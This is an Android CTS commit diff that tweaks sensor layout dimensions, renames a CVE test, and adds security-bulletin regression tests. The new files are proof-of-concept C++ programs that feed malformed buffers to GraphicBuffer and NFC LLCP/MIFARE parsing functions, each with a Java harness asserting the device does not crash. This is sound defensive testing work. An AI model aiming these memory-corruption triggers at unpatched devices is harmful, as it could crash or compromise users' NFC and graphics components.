Snap for 7653618 from 5060fce4a159b5c1b0867be33e83eb98372762ab to sc-mainline-releaseandroid-mainline-12.0.0_r4android-mainline-12.0.0_r36android12--mainline-release

Change-Id: I2681d803a478acf31c9e3bf38b2e964ee820807f

36 files changed, 1005 insertions, 35 deletions

diff --git a/apps/CtsVerifier/res/layout-land/sensor_test.xml b/apps/CtsVerifier/res/layout-land/sensor_test.xml
index 5dbd95a74fb..9d8f4d68caf 100644
--- a/apps/CtsVerifier/res/layout-land/sensor_test.xml
+++ b/apps/CtsVerifier/res/layout-land/sensor_test.xml
@@ -46,7 +46,7 @@
 
             <android.opengl.GLSurfaceView android:id="@+id/gl_surface_view"
                     android:visibility="gone"
-                    android:layout_width="0dp"
+                    android:layout_width="@dimen/snsr_glview_size"
                     android:layout_height="match_parent"
                     android:layout_weight="1"/>
 
diff --git a/apps/CtsVerifier/res/layout-port/sensor_test.xml b/apps/CtsVerifier/res/layout-port/sensor_test.xml
index 024a3f388fe..9d00b86fc7b 100644
--- a/apps/CtsVerifier/res/layout-port/sensor_test.xml
+++ b/apps/CtsVerifier/res/layout-port/sensor_test.xml
@@ -37,7 +37,7 @@
 
         <android.opengl.GLSurfaceView android:id="@+id/gl_surface_view"
                 android:visibility="gone"
-                android:layout_height="0dp"
+                android:layout_height="@dimen/snsr_glview_size"
                 android:layout_weight="1"
                 android:layout_width="match_parent"/>
 
diff --git a/apps/CtsVerifier/res/layout-small/sensor_test.xml b/apps/CtsVerifier/res/layout-small/sensor_test.xml
index 348e3219dc3..7f2805eb2e9 100644
--- a/apps/CtsVerifier/res/layout-small/sensor_test.xml
+++ b/apps/CtsVerifier/res/layout-small/sensor_test.xml
@@ -37,7 +37,7 @@
 
             <android.opengl.GLSurfaceView android:id="@+id/gl_surface_view"
                 android:visibility="gone"
-                android:layout_height="0dp"
+                android:layout_height="@dimen/snsr_glview_size"
                 android:layout_weight="1"
                 android:layout_width="match_parent"/>
 
diff --git a/apps/CtsVerifier/res/values-small-watch/dimens.xml b/apps/CtsVerifier/res/values-small-watch/dimens.xml
new file mode 100644
index 00000000000..24e84c5b02c
--- /dev/null
+++ b/apps/CtsVerifier/res/values-small-watch/dimens.xml
@@ -0,0 +1,18 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2021 The Android Open Source Project
+
+     Licensed under the Apache License, Version 2.0 (the "License");
+     you may not use this file except in compliance with the License.
+     You may obtain a copy of the License at
+
+          http://www.apache.org/licenses/LICENSE-2.0
+
+     Unless required by applicable law or agreed to in writing, software
+     distributed under the License is distributed on an "AS IS" BASIS,
+     WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+     See the License for the specific language governing permissions and
+     limitations under the License.
+-->
+<resources>
+    <dimen name="snsr_glview_size">80dp</dimen>
+</resources>
diff --git a/apps/CtsVerifier/res/values/dimens.xml b/apps/CtsVerifier/res/values/dimens.xml
index faea2b54180..891e740a760 100644
--- a/apps/CtsVerifier/res/values/dimens.xml
+++ b/apps/CtsVerifier/res/values/dimens.xml
@@ -36,6 +36,8 @@
     <dimen name="snsr_view_padding_left">8dp</dimen>
     <dimen name="snsr_view_padding_right">8dp</dimen>
 
+    <dimen name="snsr_glview_size">0dp</dimen>
+
     <dimen name="js_padding">10dp</dimen>
 
     <!-- Default screen margins, per the Android Design guidelines. -->
diff --git a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceAndProfileOwnerTest.java b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceAndProfileOwnerTest.java
index f69cbaaf04e..fa044aded41 100644
--- a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceAndProfileOwnerTest.java
+++ b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/DeviceAndProfileOwnerTest.java
@@ -185,7 +185,7 @@ public abstract class DeviceAndProfileOwnerTest extends BaseDevicePolicyTest {
     private static final int PERMISSION_GRANT_STATE_GRANTED = 1;
     private static final int PERMISSION_GRANT_STATE_DENIED = 2;
     private static final String PARAM_APP_TO_ENABLE = "app_to_enable";
-    public static final String RESOLVE_ACTIVITY_CMD = "cmd package resolve-activity --brief %s | tail -n 1";
+    public static final String RESOLVE_ACTIVITY_CMD = "cmd package resolve-activity --brief --user %d %s | tail -n 1";
 
     private static final String NOT_CALLED_FROM_PARENT = "notCalledFromParent";
 
@@ -1723,7 +1723,7 @@ public abstract class DeviceAndProfileOwnerTest extends BaseDevicePolicyTest {
         final List<String> enabledSystemPackageNames = getEnabledSystemPackageNames();
         for (String enabledSystemPackage : enabledSystemPackageNames) {
             final String result = getDevice().executeShellCommand(
-                    String.format(RESOLVE_ACTIVITY_CMD, enabledSystemPackage));
+                    String.format(RESOLVE_ACTIVITY_CMD, mUserId, enabledSystemPackage));
             if (!result.contains("No activity found")) {
                 return enabledSystemPackage;
             }
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/Android.bp
new file mode 100644
index 00000000000..1ca3f7e2a1c
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/Android.bp
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2018-9547",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    shared_libs: [
+        "libui",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/poc.cpp
new file mode 100644
index 00000000000..7ec82f37f0b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9547/poc.cpp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <ui/GraphicBuffer.h>
+#include "../includes/memutils.h"
+
+int main() {
+    size_t size = sizeof(int) * 6;
+    int *tempBuffer = (int *)malloc(size);
+    if (!tempBuffer) {
+        return EXIT_FAILURE;
+    }
+    memset(tempBuffer, 0x0, size);
+    tempBuffer[0] = 'GB01';
+    void const *buffer = const_cast<void const *>((void *)tempBuffer);
+    int const fds[] = {0, 0};
+    size_t count = sizeof(fds) / sizeof(int);
+    int const *fd = const_cast<int const *>(fds);
+    android::GraphicBuffer *graphicBuffer = new android::GraphicBuffer();
+    graphicBuffer->unflatten(buffer, size, fd, count);
+    free(tempBuffer);
+    return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/Android.bp
new file mode 100644
index 00000000000..4af3fe41755
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2018-9564",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+    ],
+    compile_multilib: "64",
+    include_dirs: [
+        "system/nfc/src/nfc/include/",
+        "system/nfc/src/include/",
+        "system/nfc/src/gki/ulinux/",
+    ],
+    shared_libs: [
+        "libnfc-nci",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/poc.cpp
new file mode 100644
index 00000000000..f85347599ab
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9564/poc.cpp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <llcp_api.h>
+
+#define DEFAULT_VALUE 0x02
+#define SIZE 16
+#define LENGTH 1
+
+extern bool llcp_util_parse_link_params(uint16_t length, uint8_t* p_bytes);
+
+int main() {
+  const int32_t offset = SIZE - LENGTH;
+  uint8_t* p_bytes = (uint8_t *)malloc(SIZE);
+  if (!p_bytes) {
+    return EXIT_FAILURE;
+  }
+  memset(p_bytes, DEFAULT_VALUE, SIZE);
+
+  llcp_util_parse_link_params(LENGTH, &p_bytes[offset]);
+
+  free(p_bytes);
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/Android.bp
new file mode 100644
index 00000000000..68def73f5c6
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2018-9593",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+    ],
+    compile_multilib: "64",
+    include_dirs: [
+        "system/nfc/src/nfc/include/",
+        "system/nfc/src/include/",
+        "system/nfc/src/gki/common/",
+        "system/nfc/src/gki/ulinux/",
+    ],
+    shared_libs: [
+        "libnfc-nci",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/poc.cpp
new file mode 100644
index 00000000000..25b2fb6286f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9593/poc.cpp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include "llcp_int.h"
+
+#define SIZE 16
+#define LENGTH 1
+
+extern tLLCP_CB llcp_cb;
+void llcp_init(void);
+
+int main() {
+  GKI_init();
+  llcp_init();
+  uint8_t *p_i_pdu = (uint8_t *)malloc(SIZE);
+  if (!p_i_pdu) {
+    return EXIT_FAILURE;
+  }
+
+  llcp_cb.dlcb[0].state = LLCP_DLC_STATE_CONNECTED;
+  llcp_dlc_proc_i_pdu(llcp_cb.dlcb[0].local_sap, llcp_cb.dlcb[0].remote_sap, LENGTH,
+                      &p_i_pdu[SIZE - LENGTH], nullptr);
+
+  free(p_i_pdu);
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/Android.bp
new file mode 100644
index 00000000000..9d4946f8d22
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2018-9594",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+    ],
+    compile_multilib: "64",
+    include_dirs: [
+        "system/nfc/src/nfc/include/",
+        "system/nfc/src/include/",
+        "system/nfc/src/gki/common/",
+        "system/nfc/src/gki/ulinux/",
+    ],
+    shared_libs: [
+        "libnfc-nci",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/poc.cpp
new file mode 100644
index 00000000000..4a5b163bfbf
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9594/poc.cpp
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <llcp_int.h>
+#include <nfc_int.h>
+
+extern tLLCP_CB llcp_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+void llcp_init(void);
+
+int main() {
+  GKI_init();
+  rw_init();
+  llcp_init();
+
+  tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+  if (!p_data) {
+    return EXIT_FAILURE;
+  }
+  p_data->data.p_data = (NFC_HDR *)malloc(16400 * sizeof(uint8_t));
+  if (!(p_data->data.p_data)) {
+    free(p_data);
+    return EXIT_FAILURE;
+  }
+  nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16);
+  if (!(nfc_cb.quick_timer_queue.p_first)) {
+    free(p_data);
+    free(p_data->data.p_data);
+    return EXIT_FAILURE;
+  }
+
+  uint8_t conn_id = 1;
+  llcp_cb.lcb.agreed_major_version = LLCP_MIN_SNL_MAJOR_VERSION;
+  llcp_cb.lcb.agreed_minor_version = LLCP_MIN_SNL_MINOR_VERSION;
+  llcp_cb.lcb.link_state = LLCP_LINK_STATE_ACTIVATED;
+  // Set llcp_cb.lcb.local_link_miu greater than p_msg->len
+  llcp_cb.lcb.local_link_miu = 16400;
+  llcp_cb.lcb.received_first_packet = true;
+  llcp_cb.lcb.symm_state = LLCP_LINK_SYMM_REMOTE_XMIT_NEXT;
+  tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+  NFC_HDR *p_msg = (NFC_HDR *)(p_data->data.p_data);
+  // p_msg->len is calculated based on the total PDUs in AGF PDU
+  p_msg->len = 16395;
+  p_msg->offset = 0;
+  uint8_t *p = (uint8_t *)(p_msg + 1) + p_msg->offset;
+  // First 2 bytes are set to values so that call flow goes from llcp_link_proc_rx_data
+  // to llcp_link_proc_rx_pdu and then to llcp_link_proc_agf_pdu.
+  *p = 0x00;
+  *(p + 1) = 0x80;
+  // The following are trying to emulate PDUs in AGF PDU
+  *(p + 2) = 0x00;
+  *(p + 3) = 0x02;
+  *(p + 4) = 0x02;
+  *(p + 5) = 0x40;
+  *(p + 6) = 0x00;
+  *(p + 7) = 0x01;
+  *(p + 8) = 0x02;
+  *(p + 9) = 0x40;
+  *(p + 10) = 0x00;
+  *(p + 11) = 0x02;
+  *(p + 12) = 0x40;
+
+  llcp_link_connection_cback(conn_id, event, p_data);
+
+  free(p_data);
+  free(nfc_cb.quick_timer_queue.p_first);
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-29368/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-29368/Android.bp
index 7b410b76277..3d54d70dde3 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2021-29368/Android.bp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-29368/Android.bp
@@ -16,7 +16,7 @@
  */
 
 cc_test {
-    name: "CVE-2021-29368",
+    name: "CVE-2020-29368",
     defaults: ["cts_hostsidetests_securitybulletin_defaults"],
     srcs: ["poc.cpp",],
 }
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-29368/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-29368/poc.cpp
index 1b3528cd24a..1b3528cd24a 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2021-29368/poc.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-29368/poc.cpp
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/Android.bp
new file mode 100644
index 00000000000..470f2561c51
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/Android.bp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2021-0596",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    compile_multilib: "64",
+    include_dirs: [
+        "packages/apps/Nfc/nci/jni/extns/pn54x/inc",
+        "packages/apps/Nfc/nci/jni/extns/pn54x/src/common",
+        "packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare",
+        "system/nfc/src/gki/common",
+        "system/nfc/src/gki/ulinux",
+        "system/nfc/src/include",
+        "system/nfc/src/nfa/include",
+        "system/nfc/src/nfc/include",
+    ],
+    shared_libs: [
+        "libnfc_nci_jni",
+    ],
+    cflags: [
+        "-DCHECK_UNDERFLOW",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
new file mode 100644
index 00000000000..9b250044e38
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+#include "phNxpExtns_MifareStd.h"
+
+uint8_t NFC_GetNCIVersion() {
+    return NCI_VERSION_2_0;
+}
+
+int main() {
+    uint8_t *buffer = (uint8_t*) malloc(16 * sizeof(uint8_t));
+    if (buffer == nullptr) {
+        return EXIT_FAILURE;
+    }
+    uint8_t bufferSize = 1;
+    buffer[0] = 0x10;
+    phNxpExtns_MfcModuleInit();
+    Mfc_RecvPacket(buffer, bufferSize);
+    free(buffer);
+    return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9547.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9547.java
new file mode 100644
index 00000000000..1bb5e0a4679
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9547.java
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9547 extends SecurityTestCase {
+
+   /**
+     * b/114223584
+     * Vulnerability Behaviour: SIGSEGV in self
+     */
+    @AsbSecurityTest(cveBugId = 114223584)
+    @Test
+    public void testPocCVE_2018_9547() throws Exception {
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9547", null, getDevice());
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9564.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9564.java
new file mode 100644
index 00000000000..6e4d588205a
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9564.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9564 extends SecurityTestCase {
+
+    /**
+     * b/114238578
+     * Vulnerability Behaviour: SIGSEGV in self
+     */
+    @AsbSecurityTest(cveBugId = 114238578)
+    @Test
+    public void testPocCVE_2018_9564() throws Exception {
+        AdbUtils.assumeHasNfc(getDevice());
+        pocPusher.only64();
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9564", null, getDevice());
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9593.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9593.java
new file mode 100644
index 00000000000..e899b7ae9e9
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9593.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9593 extends SecurityTestCase {
+
+    /**
+     * b/116722267
+     * Vulnerability Behaviour: SIGSEGV in self
+     */
+    @AsbSecurityTest(cveBugId = 116722267)
+    @Test
+    public void testPocCVE_2018_9593() throws Exception {
+        AdbUtils.assumeHasNfc(getDevice());
+        pocPusher.only64();
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9593", null, getDevice());
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9594.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9594.java
new file mode 100644
index 00000000000..d6e8fb59c0e
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9594.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9594 extends SecurityTestCase {
+
+    /**
+     * b/116791157
+     * Vulnerability Behaviour: SIGSEGV in self
+     */
+    @AsbSecurityTest(cveBugId = 116791157)
+    @Test
+    public void testPocCVE_2018_9594() throws Exception {
+        AdbUtils.assumeHasNfc(getDevice());
+        pocPusher.only64();
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9594", null, getDevice());
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_29368.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29368.java
index b0f19ada221..43a058c5543 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_29368.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29368.java
@@ -23,7 +23,7 @@ import org.junit.runner.RunWith;
 import static org.junit.Assert.*;
 
 @RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_29368 extends SecurityTestCase {
+public class CVE_2020_29368 extends SecurityTestCase {
 
    /**
      * b/174738029
@@ -31,7 +31,7 @@ public class CVE_2021_29368 extends SecurityTestCase {
      */
     @AsbSecurityTest(cveBugId = 174738029)
     @Test
-    public void testPocCVE_2021_29368() throws Exception {
-        AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2021-29368", getDevice(),60);
+    public void testPocCVE_2020_29368() throws Exception {
+        AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2020-29368", getDevice(),60);
     }
 }
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0591.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0591.java
new file mode 100644
index 00000000000..0c8f0a9fd1b
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0591.java
@@ -0,0 +1,83 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
